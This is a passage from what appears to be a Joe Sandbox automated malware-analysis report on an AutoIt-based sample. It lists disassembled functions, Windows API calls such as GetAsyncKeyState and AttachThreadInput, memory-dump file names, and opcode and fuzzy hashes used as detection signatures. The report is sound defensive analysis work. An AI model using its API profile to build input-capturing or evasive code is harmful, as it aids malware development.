                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                          Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3413494760-0
                                                                          • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                          • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                          Function 0044EDCC Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 472COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _strncmp
                                                                          • String ID: '$DEFINE$\$`$h$h
                                                                          • API String ID: 909875538-3708680428
                                                                          • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                          • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                                                                          • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                          • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                                                                          Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                          • String ID: AU3_FreeVar
                                                                          • API String ID: 2634073740-771828931
                                                                          • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                          • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                          Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 2294789929-1287834457
                                                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                          Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 2483343779-2107944366
                                                                          • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                          • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                          Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                          • String ID: -----$SysListView32
                                                                          • API String ID: 4008455318-3975388722
                                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                          Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                          • GetParent.USER32 ref: 00469C98
                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                          • GetParent.USER32 ref: 00469CBC
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2360848162-1403004172
                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                          Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 262282135-0
                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                          Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                          Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                          • String ID:
                                                                          • API String ID: 3771399671-0
                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                          Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                          Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 0-1603158881
                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                          Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateMenu.USER32 ref: 00448603
                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
